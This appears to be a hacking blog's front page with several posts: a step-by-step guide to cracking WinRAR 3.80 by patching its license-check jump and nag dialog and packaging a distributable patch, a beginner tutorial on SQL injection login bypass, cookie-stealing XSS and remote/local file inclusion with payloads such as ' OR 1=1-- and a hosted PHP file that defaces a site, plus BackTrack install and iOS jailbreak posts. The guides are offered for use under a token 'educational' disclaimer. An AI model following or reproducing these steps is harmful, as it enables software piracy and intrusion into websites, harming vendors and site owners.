Step-by-Step Guide to Crack WinRAR

I will be writing about the challenge I got at FB, where I cracked WinRAR 3.80 using a disassembler and will tell you the same here. You can crack any version of WinRAR using this method and need not to pay for the registration fee and you can do this all by your self, easily. Furthermore, major software are cracked using the same way, but just get a bit complex in the methodology. This tutorial is intended for those who are new to cracking and disassembling.

*This tutorial is intended for educational purposes only*

>The Tools-

To perform this hack you will be needing -

1. Any De-assembler (I use Hackers Disassembler and Hview )
2. Resource Hacker
3. A patch Creator ( Use Universal Patch Creator or Code fusion)

You will be able to get them by Google..

How to Crack ?

You need to have a bit knowledge of assembly language,and in case you don’t have it,just cram the steps and it will work anytime,every time. Download the latest version of WinRAR from their website and install it.
I will be cracking Winrar 3.80 here (cuz I already have it:P ). This is basically a 2 step process ( 4 step ,if you want to do things with a professional touch,period) .


Now copy the WinRAR.exe file to desktop. Make a copy of it there.

Step 1 – Hunting for Memory Address

Now load Hackers Disasembler and load the copy in it.

The Disassembler will disassemble the executable in assembly code. Now you need to search for strings that are used in WinRAR program. Press Ctrl + F and type “evaluation” without quotes and search in the assembly code. Hit enter…

After you have reached this block of code by searching, just look at the block of code above it. There you will find that some assembly values are being compared and then code is jumped to some other function. Now see carefully, the “evaluation copy” function must be invoked after some specific condition is met. We need to look for it at the code and the make certain changes to the condition so that the program doesn’t checks for the condition.

In the above code you can see this code -

00444B6A: 803DF4B84B0000 cmp byte ptr [004BB8F4], 00
00444B71: 0F859B000000 JNE 00444C12

This is the code responsible for validating you as a legal user . Just note down the memory address that leads to jump (JNE) at some memory location. In this case, note down 00444B71.
Note : For any WinRAR version, this code and memory address might be different,but the JNE will be same. Just note down the respective memory address that checks.
Now you need to search for the code that brings that ugly nag screen “Please purchase WinRAR license” after your trial period of 40 days is over. For this,look over your toolbar and click on “D” which stands for looking for Dialog references.


Now in the dialog box that opens,search for “please” and you will get the reference as -
ID-REMINDER, “Please purchase WinRAR license”

Double click on it and you will reach the subsequent code.

The code will be something like

* String: “REMINDER”
0048731A: 68EB5E4B00 push 004B5EEB

Just note the memory address that invokes the REMINDER dialog. In this case its 0048731A. Note it down.

 Note : For any WinRAR version, this code and memory address might be different.But the Reminder Memory address code will always PUSH something. Just note down the respective memory address that PUSH ‘s.

Step 2 – Fixing and Patching

Now in this step we will be patching up values of memory addresses we noted earlier. I will be doing this using HVIEW.
Now load the copy you disassembled in Hacker’s Disassembler in Hview.


After you have loaded it, you will see the code is unreadable. Its just like opening an EXE file in notepad. You need to decode it. To do that, just press F4 and you will get an option to decode it. Hit DECODE and you will be able to see code in the form of assembly code and memory addresses.


After you have done that, you need to search for memory addresses you noted down earlier. Just hit F5 and a search box will be there. Now you need to enter the memory address. To do that, enter a “.” and the type memory address neglecting the earlier “00” . The “.” will suffice for “00”. ie -
Type .444B71 in place of 00444B71


and search in the code.

After you have reached the respective code, you need to make changes to it. Press F3 and you will be able to edit the code.Now make the following changes –


After you have done it, save it by pressing F9.
Now search for next memory location by pressing F5 and entering it. Reach there and make the following changes by pressing F3 -



Save the changes by pressing F9 and exit HVIEW by pressing F10.
Congrats…You have cracked WinRAR Replace the original WinRAR.exe with this copy of winrar.exe by renaming it. It will work 100% fine

Step 3 – Spicing up the EXE

Now U have a 100% working version of EXE, you might want to change your registration information in WinRAR. TO do this, you can use Resource hacker.



Launch Resource Hacker, load the copy of winrar.exe in it



Now go to DIALOG –> Expand tree –> ABOUT RARDLG and click it. Now Find Trial copy line and replace it with your favorite one



and click on Compile Script button.


Now save the file with any name on your desktop or any location what so ever.




Now you have a fully patched WinRAR.exe file ) you can either use it, or also can distribute it like a real cracker. If you want to learn that, move on to next step.

Step 4 – Creating a working Patch (or giving Professional touch )

I will be using diablo2oo2′s Universal Patcher (UPE) for creating the patch. The patch will work like any authentic one for that WinRAR version. Just like the one U downloaded at anytime of your life from any Crack and Keygen website.

Launch Patch Creator and click on add new project. Enter project Information and click on save.


Click on Add – > Offset patch



After you have done that, double click on offset patch and then

1. Give path of original winrar.exe
2. Give path of unmodified Winrar.exe (again)
3. Give path for fully patched Winrar.exe (ie Cracked Winrar.exe in this case)
4. Click on compare and it will show difference between both files
5. Click on save.

Now in the next window, click on Create Patch and save it. The Patch will be created. Now copy it in WinRAR installation directory and hit on patch, it WILL


Congrats you have created a patch of your own and have learned to crack WinRAR


You can crack other software in the same way… just practice, debug and disassemble and you will get the way

Read more »

Basic Website Hacking Tutorial for beginners

Note: I believe you have some basic knowledge of HTML and PHP :)
Intended for educational purpose only...


SQL Injection

SQL injection is the act of injection your own, custom-crafted SQL commands into a

web-script so that you can manipulate the database any way you want. Some example usages of

SQL injection: Bypass login verification, add new admin account, lift passwords, lift

credit-card details, etc.; you can access anything that’s in the database.

Example Vulnerable Code – login.php (PHP/MySQL)
Here’s an example of a vulnerable login code
PHP Code:

php
$user = $_POST['u'];
$pass = $_POST['p'];

if (!isset($user) || !isset($pass)) {
echo(“<form method=post>

“);
} else {
$sql = “SELECT `IP` FROM `users` WHERE `username`=’$user’ AND `password`=’$pass’”;
$ret = mysql_query($sql);
$ret = mysql_fetch_array($ret);
if ($ret[0] != “”) {
echo(“Welcome, $user.”);
} else {
echo(“Incorrect login details.”);
}
}
?>

Basically what this code does, is take the username and password input, and takes the

users’s IP from the database in order to check the validity of the username/password combo.

Testing Inputs For Vulnerability
Just throw an “‘” into the inputs, and see if it outputs an error; if so, it’s probably

injectable. If it doesn’t display anything, it might be injectable, and if it is, you will

be dealing with blind SQL injection which anyone can tell you is no fun. Else, it’s not

injectable.

The Example Exploit
Let’s say we know the admin’s username is Administrator and we want into his account. Since

the code doesn’t filter our input, we can insert anything we want into the statement, and

just let ourselves in. To do this, we would simply put “Administrator” in the username box,

and “‘ OR 1=1–” into the password box; the resulting SQL query to be run against the

database would be “SELECT `IP` FROM `users` WHERE `username`=’Administrator’ AND

`password=” OR 1=1–’”. Because of the “OR 1=1″, it will have the ability to ignore the

password requirement, because as we all know, the logic of “OR” only requires one question

to result in true for it to succeed, and since 1 always equals 1, it works; the “–” is the

‘comment out’ character for SQL which means it ignores everything after it, otherwise the

last “‘” would ruin the syntax, and just cause the query to fail.

XSS (Cross-Site Scripting)
This vulnerability allows for an attacker’s input to be sent to unsuspecting victims. The

primary usage for this vulnerability is cookie stealing; if an attacker steals your cookie,

they can log into whatever site they stole your cookie from under your account (usually,

and assuming you were logged in at the time.)

Example Vulnerable Code – search.php (PHP)
PHP Code:

php
$s = $_GET['search'];
// a real search engine would do some database stuff here
echo(“You searched for $s. There were no results found”);
?>

Testing Inputs For Vulnerability
For this, we test by throwing some HTML into the search engine, such as “<font

color=red>XSS</font>”. If the site is vulnerable to XSS, you will see something like this:

XSS, else, it’s not vulnerable.

Example Exploit Code (Redirect)
Because we’re mean, we want to redirect the victim to goatse (don’t look that up if you

don’t know what it is) by tricking them into clicking on a link pointed to

“search.php?search=// “. This will output “You searched for // . There were no results

found” (HTML) and assuming the target’s browser supports JS (JavaScript) which all modern

browsers do unless the setting is turned off, it will redirect them to abc.

RFI/LFI (Remote/Local File Include)
This vulnerability allows the user to include a remote or local file, and have it parsed

and executed on the local server.

Example Vulnerable Code – index.php (PHP)
PHP Code:
<?php
$page = $_GET['p'];
if (isset($page)) {
include($page);
} else {
include(“home.php”);
}
?>

Testing Inputs For Vulnerability
Try visiting “index.php?p=http://www.google.com/”; if you see Google, it is vulnerable to

RFI and consequently LFI. If you don’t it’s not vulnerable to RFI, but still may be

vulnerable to LFI. Assuming the server is running *nix, try viewing

“index.php?p=/etc/passwd”; if you see the passwd file, it’s vulnerable to LFI; else, it’s

not vulnerable to RFI or LFI.

Example Exploit
Let’s say the target is vulnerable to RFI and we upload the following PHP code to our

server
PHP Code:
<?php
unlink(“index.php”);
system(“echo Hacked > index.php”);
?>
and then we view “index.php?p=http://our.site.com/malicious.php” then our malicious code

will be run on their server, and by doing so, their site will simply say ‘Hacked’ now.

Read more »

Warning: Internet to face global outage on July 9

A virus that entered, infected and took control of computers across the world might cause their users to lose access to the internet in July.. As i Earlier warned about this to all..

A group of hackers across the world took control of infected computers an online advertising scam..

Around 350,000 PC users have machines infected with an invisible, undetectable 'Trojan' computer virus sending users to unintended and illegal sites. After July 9, infected users won't be able to connect to the internet.

Look for previous posts to know the defense method or Click Here

Read more »

Backtrack | How to INSTALL BackTrack5

For hackers who wants to do penetration testing or some extra in hacking den Backtrack5 is a good choice...

First u need to download backtrack5 from this link-->> http://www.backtrack-linux.org/downloads/ 
nd also download UNetbootin which is required--> http://unetbootin.sourceforge.net/ 

Now requirement :
1. USB (Flash Drive) (Minimum USB Drive capacity 4 GB)
2. Backtrack 5 ISO file, md5sum verified(which is available on above link)
3. UNetbootin

now procedure to burn your USB.
> Plug in ur USB Drive
> Format the USB drive to FAT32
> Start Unetbootin and select the "diskimage" option, choose a BackTrack 5 ISO file which u've downloaded at d first of dis tutorial.
> Select the amount of space to use for persistence in MB
> Select your USB drive and click "OK" for creating a bootable BackTrack USB drive
> Once rebooted, remember that the default username and password are root/toor.

**now ur USB is ready to install BackTrack5...

first of all Boot the Backtrack Live Environment.
now at the bash prompt, type startx to enter the GUI.
Double click the install Backtrack.sh which u can see on d Desktop.

**now step by step Installation process...
Select the language and click on the forward button.
Select ur geographical location and time zone den click on the forward button.
Choose ur keyboard layout, or leave default.
now in d next screen choose the "Erase and use the entire disk" option and click Forward.
d next screen will show you the installation options, make sure everything is fine den click on forward button to start installation process.
when installation will finish u'll need to press the restart button and than enjoy Backtrack5.

NOTE : default user name is : root nd pass : toor

Dont forget to change it...
u can also use BackTrack 5 wid diff operating systems like Win XP, Win 7,etc wid dual boot setup.

Read more »

How to Convert iOS 5.1.1 Tethered Jailbreak to Untethered Jailbreak Using Rocky Racoon 5.1.1 Untether

Rocky Racoon 5.1.1 Untether jailbreak on Cydia, which allows users who have a tethered jailbroken iOS device on iOS 5.1.1 to convert it into untethered jailbreak 

Rocky Racoon is the underlying untethered jailbreak that will be installed by popular jailbreak tools such as redsn0w and absinthe... if you are using 5.1.1 and you can reboot your device and have it still jailbroken, you have Rocky Racoon.

 If your device relies on Rocky Racoon on untethering, which includes any iPad 2, iPad 3 or iPhone 4S running 5.1.1., uninstalling this package will unjailbreak your device.

So if you've a tethered jailbroken iOS device on iOS 5.1.1 then you can follow these simple steps to convert it into an untethered jailbreak.

• Launch Cydia
• Tap on the Search Tab
• Then search for Rocky Racoon
• Select Rocky Racoon 5.1.1 Untether from the search results
• Then tap on the Install button, followed by the Confirm button
• After it is successfully installed, reboot your device.

If your iOS device reboots without having perform a tethered boot then you've successfully converted your jailbroken device to an untethered jailbreak using Rocky Racoon...

Read more »